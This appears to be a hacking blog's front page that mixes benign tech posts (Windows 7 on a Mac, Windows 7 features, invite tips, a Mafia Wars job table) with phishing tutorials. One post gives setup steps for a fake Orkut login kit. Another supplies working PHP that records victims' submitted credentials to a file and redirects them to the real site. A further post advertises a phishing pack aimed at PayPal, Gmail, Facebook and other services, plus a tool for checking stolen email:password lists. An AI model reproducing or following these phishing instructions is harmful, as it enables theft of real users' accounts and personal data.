How To HacK Orkut

0 comments
Fake logins are pages which are actually not the server files but a file which is created to mislead people to get passwords and personal Data.So with this you can get people by leading them to your site and then they give their e-mail and password and will get hacked. First download it and then follow the installation steps.

Download Fake Login (orkut)


Hack-Genius

Installation

  1. First extract the contents into a folder
  2. Then edit login.php .(right click and then select edit)

  3. In that ,find (CTRL+F) 'http://hack-genius.blogspot.com' then change it to your destined URL but don't forget '\'.
  4. Save it .
  5. Create an id in www.110mb.com , because i know about that site quite well.
  6. Then upload the contents into a directory
  7. For that,after creating an id you should go to file manager and upload all these files.
  8. Then just got to Orkut.htm and try out whether its working .
  9. After you type the file , a password file will be created in the same directory .
  10. Then you can see what username and password you have entered.
Enjoy ! Make sure you subscribe to my feed
Read More >>

How to Install Windows 7 On macintosh

0 comments
http://www.slotsgeek.com/slots/mac/images/MacLogo.jpg

Before you start to install  windows 7 on your Mac using Boot Camp you will need the following:

  1. All firmware updates installed on your Mac (use Apple Button -> Software Update… to check)
  2. A Windows 7 installation DVD
  3. Your OS X Leopard installation DVD
  4. At least 10GB of empty hard drive space on your Mac (you can probably get away with less but you’ll have almost no room to install anything other than the OS)
  5. An hour if all goes well, up to 5 hours if not
  6. Though not absolutely required, it’s a VERY good idea to have a complete and up to date Time Machine backup of OS X – it really came in handy for me. Because part of the process involves partitioning your drive, there’s always the distinct chance something will go wrong and everything will be wiped out.
  7. Patience, possibly a great deal of it. Having a book handy will also help kill time during the partitioning, installing etc).

Installing Windows 7 via Boot Camp

  1. Here goes. First thing – close absolutely every open program you can. That includes those things running in the Apple Menu that you always forget about. Don’t worry about killing the Dock or Dashboard – having those running is fine.
  2. Now open a Finder and navigate to Applications -> Utilities and double-click Boot Camp Assistant.
  3. finder displaying the boot camp utility
  4. Click Continue on the initial Introduction screen. Ignore the fact that it doesn’t mention Windows 7 as a possible OS to install.
  5. Now you have to decide how much space you want to allocate to Windows 7. You might be able to get away with going as low as 6GB, but I would highly advise against it. You’ll have almost no space left over to install software, and your page file in Windows might cause frequent crashes. I opted for 20GB, which left me with just a bit over 16GB to use after installing Windows 7.To change the amount of space to dedicate to Windows 7, click the small divider between Mac OS X and Windows, and drag it to the left.
  6. Once you’ve determined how much space you want to allocate to Windows 7, click the Partition button.
  7. The partitioning itself doesn’t take particularly long. If you receive an error, proceed to step 10 of the “How to install Vista with Boot Camp” tutorial. It provides all the troubleshooting info you need to resolve partitioning issues. Once you’ve cleared up any problems, or if everything just goes smoothly, proceed with the next step in this tutorial.
  8. Once completed you’ll notice a new BOOTCAMP drive on your desktop.
  9. Now insert your Windows 7 DVD and click the Start Installation button.
  10. Your Mac will restart, and Windows 7 will boot. You’ll be prompted with a window asking you which partition you want to install Windows on. Select the one with BOOTCAMP in the Name column. Selecting anything else may wipe out OS X or cause serious problems. Then select the Drive options (advanced) link.
  11. 10.With the BOOTCAMP volume still selected, click the Format link.
  12. Click OK.
  13. And Windows 7 will begin to install. It’s a fairly boring process, so you may want to grab yourself a cup of coffee or your beverage of choice. But don’t go too far away, because when your system reboots, you’ll need to remove the Windows 7 DVD.
  14. With the Windows 7 DVD removed, your Mac will automatically boot back into Windows 7, and the installation will complete. You’ll be prompted to select your language, keyboard layout etc. The rest of the Windows 7 installation process is very straight forward.
  15. Once the installation has completed and your Mac has restarted again, you’ll be able to use Windows 7. WiFi will work immediately (no drivers to install) so connect to the Internet. Windows 7 will then begin to download updates, including the proper video card driver. Let it do its thing.
  16. Once completed, you’ll be prompted to reboot yet again. Do so.
  17. Once Windows 7 boots back up again, you’ll notice the resolution is much better, and you can enable the advanced graphics features.
  18. But if you check for sound, you’ll notice there are no sound drivers installed.
  19. Insert your OS X Leopard DVD. When prompted, select Run setup.exe.
  20. The Boot Camp installer will launch. Click Next to begin.
  21. Select I accept the terms in the license agreement and then click Next again.
  22. Make sure that Apple Software Update for Windows is checked, and click Install.
  23. The Boot Camp installer will do its thing, and install all the required drivers.
  24. Notifications will pop up with each driver that gets installed.
  25. Once completed, click Finish.
  26. And yet again you’ll be prompted to reboot. Remove your OS X Leopard DVD from the drive, and click Yes to restart.
  27. If you still have problems with sound not working, you’ll need to install the Realtek drivers. Windows 7 Tutorial will explain what to do.
  28. That’s it, you’re done! When your Mac boots, hold down the Option key to select which Operating System you want to boot into Windows 7 tutorial.
  29. do you want to boot into OS X or Windows I choose OS X FULL CREDIT GOES TO WINDOWS7PARK
Read More >>

Fake login page

2 comments


I’ve posted about phishing and the techniques attacker’s use to spread their phishing sites. Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post, you are agreeing to our DISCLAIMER.


  1. Select a target website and navigate to their login page.
  2. Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)
  3. You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
  4. Create a PHP file and name it “phish.php”.
  5. Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website.

    01.
    02.Header("Location: http://www.RealSite.com");
    03. 
    04.$handle = fopen("list.txt", "a");
    05. 
    06.foreach($_GET as $variable => $value) {
    07. 
    08.fwrite($handle, $variable);
    09.fwrite($handle, "=");
    10.fwrite($handle, $value);
    11.fwrite($handle, "\r\n");
    12.}fwrite($handle, "\r\n");
    13. 
    14.fclose($handle);
    15.exit;
    16.?>

    6.  Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTMl file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL.  The HTML code should start with something like this:

    7.  Once everything is complete, upload the files to a free webhost that supports PHP.
    8.  That’s it! You’ve just created a phishing page.
    UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.

Read More >>

New orkut invitations : Is anybody left ...!!!

0 comments
What is new in NEW ORKUT?

  • Fewer pages, faster browsing
  • A clean, simple interface:
  • Greater personalization:




There are two ways to Get an invite:
Join Poppy and Shashi on the official community 

or
Find a friend who's already using the new version of orkut and ask for an invite. You can see who's already gotten access via your activity stream or by this icon that will appear on your friends' profile pages, next to their names.   
If U are still one of those who does not has the invitation just Contact me
Read More >>

18 cool things Windows 7 does that Vista doesn't

0 comments

 
 
Well, yesterday i changed my PC operating system to Windows 7 and as per my experience , windows 7 is the best version of operating system Microsoft ever release. In fact, there aren't many changes to the overall look of Windows 7 when compared to Windows Vista. Instead, Microsoft seems to have paid attention to the feedback it received and created an OS that is not only stable, but also very capable.

So what is new in Windows 7? Here are 18 cool things Windows 7 does that Vista doesn't.

1. Shake 'em away
Ever had 10 Notepad, two Powerpoint and 50 Outlook windows open? Want to minimise all of them except the most important one? In Windows 7, you can grab the top of the window and shake it about to scare away all of the other open windows. Simple.

2. Jumplists
Jumplists are a new feature that give you the option to view a list of recently accessed files by application, even when the application isn't open, by right-clicking on the application's icon in the taskbar. It also allows you to quickly access a favourite playlist without opening your media player. Jumplists can also be found integrated into the Start Menu.
Jumplist
TIME-SAVER: The Jumplist for Windows Explorer – pretty useful
Jumplist in start menu
START HERE: A Jumplist integrated into the Start Menu

3. A step forward in previewing
In Vista, hovering over a minimised window on the taskbar would provide a preview of the window. In Windows 7, a similar preview pops up which also gives the option to close a window (within the preview), along with a full-size 'peek'. You can also press Win + T to scroll along previews in the taskbar.
Preview feature
PREVIEW PLUS: A smaller preview, along with a full-size 'peek' with the ability to close the window

4. Snap into place
Simply drag your window to the left or right edge of the desktop to snap and resize the window to one half of the screen. Drag the window to the top to maximise it. A pretty neat idea made neater by the use of the keyboard shortcuts (Win + respective arrow keys). No longer do you have to frustratingly position the mouse at the edge of the window to resize it.


5. XP Mode
This time, you do not have to slap your head that same way when Vista would not run an XP application. For those XP applications that do not work under Windows 7, you can download XP Mode free from the Microsoft website and run XP applications in an emulated XP environment in Windows 7. Imagine Parallels on Mac OS X without the need to fish out money on an extra OS.

6. An easier and quicker way to adjust multiple displays
Do you constantly connect your computer to different external monitors or projectors, especially at work? Try Win + P, and duplicating or extending your display to the other monitor takes just a second. Win + P presents you with an Alt + Tab style menu, which is ideal if you give a lot of presentations at work on your laptop.

7. A personalised Stage for your device
With the new 'Device and Printers' button on the Start Menu, devices which are connected to your computer can have their own Stage. This Device Stage presents supported devices with a photo-realistic render and a link to the vendor's website, along with other updates and useful information (such as firmware updates and manuals).

8. (Almost) eliminate the notification area!
What, I can even get rid of the clock and volume icons? Yes. Click the arrow that gives access to the overflow icons in the notification area and click 'customise'. Select each icon and click 'hide icon and notifications' to remove it. Clean.
Tidy notification bar
QUIETER: Stop all those notifications – but you might want to keep the clock there

9. Problem Steps Recorder
The 'Problem Steps Recorder' lets you record a particular problem you are having with your PC so you can send it to someone who may be able to help. Click 'Record', and a screenshot is taken with every mouse click, allowing comments to be added in between if required. These screenshots (and comments, if any) are placed in a well-formatted HTML document that is placed inside a zipped folder on your desktop - ideal to be attached to an email.
Problem steps recorder
A PROBLEM HALVED: Simple, yet so effective. Send this to tech savvy friends or even manufacturers

10. A brand new Magnifier tool
If you are, or someone you know, is visually impaired, then the Windows 7 Magnifier provides two options for providing a bigger display. One of which is using the traditional dock (which took up a lot of the screen) and the other being a rectangular lens that is stuck to the cursor (meaning there is no loss of workspace).
Magnifier
UP CLOSE: A sleek new magnifier that follows your cursor, without decreasing your workspace

11. A new way to preview your music files
Opening and listening to an MP3 is a lot more snappier with Windows 7 due to its new smaller preview player, presenting you with album art, basic music functionality and a link to the full-blown Windows Media Player. This is an obvious attempt to mimic the preview feature of Mac OS X, but it is very well executed.
Windows media preview
MUSIC PREVIEW: The new preview is simple – and loads up very quickly

12. Homegroup Networking
In Vista (or, frankly, any Windows OS), creating a shared folder over a network at home could be a bit of a pain. In Windows 7, using the 'Homegroup' wizard, check the default folders you would like to share. This will give you a passcode that will have to be entered in another computer on the same network to share the files. Sounds too good to be true? There is a catch: only a Windows 7 computer can join a Homegroup.


13. Stream Music directly to another computer
If you do create a Homegroup, Windows Media Player allows you to stream music directly to another computer. So, instead of listening to music through your measly laptop speakers, you can wirelessly stream to the 7.1 Surround Sound Speakers of your PC in your living room, without stepping away from your laptop. Sweet.

14. Action Center
The Action Center is the new Security Center for Windows 7, along with other notifications such as updates and access to the improved troubleshooting and recovery using restore point facilities. Basically, it is everything windows usually annoys you with, rolled into one place with one icon in the notification bar. If you find the alerts irritating, you can check out this tip to make the Windows 7 Action Center less annoying.

15. Pin just about anything to the new Windows Taskbar
Imagine a blank Mac OS X Dock with the start menu, the notifications bar and the improved 'Show Desktop' button added to it. Drag just about anything on to it and the associated application will place itself on the translucent taskbar, with an option to open the file in the Jumplist.

16. Improved Touch Navigation
Windows 7 has much improved touch navigation. The larger taskbar with squarer icons makes it a lot easier to navigate with your fingers, and Macbook-like multi-touch gestures on various applications could change the way you interact with windows. Subtle enhancements such as a larger Start Menu appearing when Touchscreen hardware is detected also help.

17. Native ISO Burner
There are those times when you inevitably have to burn an ISO file (such as when you have to copy a downloaded Windows 7 beta or RC) to a DVD. With Windows 7 you do not need to download third-party software (some of which are pretty confusing to use). Double-clicking on an ISO file will take you to a window that allows you to change the disc burner drive. Click 'Burn'. After a while, your disc is ready. Simple.
ISO burner
FINALLY: Burning an ISO file has never been so easy

18. Native calibration tools
If you tend to hook up your computer to an HDTV or care about getting the highest quality from your monitor, then the in-built basic and easy-to-use calibration tools built into Windows 7 will please you.
Read More >>

How to get a Google Wave Invitation? [Invite]

0 comments
Google Wave is an online tool for real-time communication and collaboration. A wave can be both a conversation and a document where people can discuss and work together using richly formatted text, photos, videos, maps, and more.


Google started sending out invitations yesterday for the limited preview of Google Wave to the first 100,000 signups for Wave, and you can see the excitement on every tech blog and forums that are filled with users asking for Google Wave invites.

How To Get Google Wave Invite?

I’ve been able to come out with various ways by which you can also have an invitation for yourself. These are not just waste of time. People have got invites using them. So do give them a try if you desperately want a Google Wave invite, like the rest of us!

P.S. Don’t fell for anyone ’selling’ Google Wave invitations. Yes, there are folks at eBay selling Wave invitations!
Read More >>

Learn How To Hack

1 comments
A couple of days ago I find great hacking (e)book called The Hacker’s Underground Handbook, (e)book that comes as an aid for all those that are starting journey to learn how to hack It was made specifically for the beginners who really want to get into hacking and for those of us who began and got lost.








The Hacker’s Underground Handbook





Download









This book will guide you in the right direction helping you understand password cracking, phishing, network hacking, wireless hacking, malware, Windows hacking and etc.

I was really surprised how this book laid out the information, presenting it in an easy to read and understandable fashion. In each chapter the author first introduces you to the topic and then shows you a real-world example with step-by-step instructions with images. It makes hacking look so easy!

Once you complete reading this book, the author explains where to go from there and how to keep learning. You will never again be lost and overwhelmed by all the hacking information out there.
If you think this book is something you would be interested in, you can get it here. Hacker's Underground Handbook
Read More >>

Complete guide on phishing - Phishing Pack 2009

0 comments
http://wearecentralpa.com/media/jpg/phishing2009-02-18-1234986039.jpg
Complete guide on phishing - Phishing Pack (bulletproof How To Phish Guide)


The Pack Includes:

  1. -AnonymousMailer
  2. -Phisher Maker! Read the ReadMe.txt
  3. -Jiffy Gmail Account Creator - Create GMAIL acc for setting up hosting acc etc.
  4. -Tarantula a Powerful software to extract e-mail addresses matching your keyword query
  5. -RapidExtract is a tool that checks EMAIL:PASSWORD lists, for rapidshare accounts, if the email has a rapidshare account it then sends the login to the email. Then you can login to the email (most people use same pass for everything) and obtain the rapidshare account.
  6. -IP Hider Pack - Read the ReadMe.txt
  7. -Steam Phiser
  8. -Rapidshare Phiser
  9. -Friendster Phiser
  10. -Gmail Phisher
  11. -Habbo Phisher
  12. -Facebook Phisher
  13. -Photobucket Phisher
  14. -XboxLive Phisher
  15. -AIM Phisher
  16. -GaiaOnline Phisher
  17. -IMVU Phisher
  18. -AstaTalk Phisher
  19. -Warez-bb Phisher
  20. -Hotmail Phisher
  21. -Paypal Phisher
  22. -Runescape Phisher
  23. -youtube Phisher
and many many more.

What will you learn : Setting up ur phisher and hiding your links.


LIST OF PHiSHERS
 

The Author Of This Guide or this blog Is NOT Responsible For ANYTHING You Do With This , We encourage you not to use any of this. It was only created for educational purposes and to demonstrate how web pages are vulnerable. If you EVER see a phisher please report it. PHISHERS ARE ILLEGAL.

Read More >>

Hack MafiaWars - Facebook

0 comments

Mafia wars is one of the best online games with millions of players .i just started playing the game . And searched for some hacks all the hacks are patched now and i found a work trick to increase the gang members in mafia wars in facebook instently just in 60 min with just with a click

Make 1200 Gang members With One Click

1. Enter this into your URL:
http://www.facebook.com/invite.php?ref=sb
2. Where it says “To:” copy and paste the list of email addresses from the last person who posted a reply to this topic.
3. Where it says “Message:” put “Mafia Wars fast 501 for all”.


4. Then just click “Invite”.
Now go back to the last person who has posted a reply to this topic click “Reply”. Again paste the email list but this time type your email address at the bottom of the list followed by a comma (,) and a space. Then click “Post reply” and you’re done.Or jUst post your email address in the comment field i will add your email to the list .
Now the next person will add their email address along with an comma (,) and a space and so on and so forth. If everyone in the Mafia Wars Discussion. replies to this topic then everyone will get hundreds of new Mafia members. Easy.
If you don’t like the idea of having hundreds of strangers as “friends” then simply delete them from your friends list after you send them an invite to your Mob. It won’t delete the mafia invite, they can still accept it and join your Mob
Also Add Me To You Mafia :143.exe@gmail.com
i will soon post some scripts to automate the game play soo keep visiting the site

Mafiawars LOOPHOLE TO EASY-ADD FRIENDS

Yes, this is real and NO other Mafia Adding technique out there can touch this!
There is a new Mafia Wars loophole that allows ANYONE to click on a link and Easy Add people to their mafia WITHOUT being friends first. This is really unbelievable, we should take advantage of this before Zynga fixes it! It is really easy.
Follow these directions:
The links should be in the format of mine below:
http://apps.facebook.com/inthemafia/remote/html_server.php?xw_controller=war&xw_action=add&xw_city=1&friend_id=100000186883227
1 Copy the link above and replace my ID (100000186883227) with yours.
2 Paste the link in the discussion board, or in the wall below

Mafia Wars Optimal EXP and Payout Job Guide

  • EXP – Experience Points Ratio
  • LOW/EnP – The lowest payout return per single energy point
  • HIGH/EnP – The highest payout return per single energy point

EXP

LOW/EnP
HIGH/EnP
Street Thug



Mugging
1
$200.00
$300.00
Corner Store Hold-Up
1
$266.67
$400.00
Warehouse Robbery
1
$280.00
$500.00
Auto Theft
1
$260.00
$390.00
Rob A Pimp
1
$366.67
$500.00
Mafia Soldier



Collect Protection Money
1
$420.00
$630.00
Rough Up Dealers
1
$560.00
$840.00
Take Out A Rogue Cop
1
$533.33
$800.00
Perform A Hit
1
$533.33
$800.00
Bank Heist
1.5
$400.00
$650.00
Jewelry Store Robbery
1.33
$333.33
$1,000.00
Hitman Jobs



Destroy Mob Hideout
1
$1,280.00
$1,920.00
Kill A Snitch
1
$1,408.00
$2,112.00
Bust A Man Out of Prison
1
$1,520.00
$2,280.00
Museum Break-in
1.22
$2,666.67
$4,000.00
Fight A Haitian Gang
1
$1,466.66
$2,200.00
Capo Jobs (*incl. prep jobs)



Federal Reserve Raid
1.2
$4,000.00
$16,000.00
Smuggle Across the Border
1.14
$4,000.00
$6,000.00
Liquor Smuggling*
1.18
$11,250.00
$20,000.00
Run Illegal Poker Game*
1.48
$15,000.00
$25,000.00
Wiretap the Cops*
1.43
$50,000.00
$100,000.00
Underboss Jobs



Repel the Yakuza
1.38
$8,307.69
$12,461.54
Disrupt Rival Smugglers
1.33
$9,466.67
$14,200.00
Invade Tong Neighborhood
1.2
$9,600.00
$14,400.00
Sell Guns to Russians
1.4
$40,000.00
$120,000.00
Protect against Rival Family
1.43
$62,857.14
$120,000.0
Assassinate a Politician
1.43
$71,428.57
$142,857.14
Exterminate a Rival Family
1.75

$75,000.00
$150,000.00
Read More >>

Link 2 Us

Hack-Genius

Live Traffic

Blog Archive

 

Copyright 2008 All Rights Reserved Revolution Two Church theme by MalluVdo Converted into Blogger Template by Hackingaday.com